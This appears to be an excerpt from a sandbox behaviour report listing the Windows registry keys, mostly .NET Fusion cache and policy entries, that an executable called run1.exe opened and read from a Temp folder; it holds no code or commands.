HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3f88eb81\5dd1eb81
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\78599698\6ebe1617
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|run1.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|run1.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|run1.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\78599698\76cce762
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index21
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
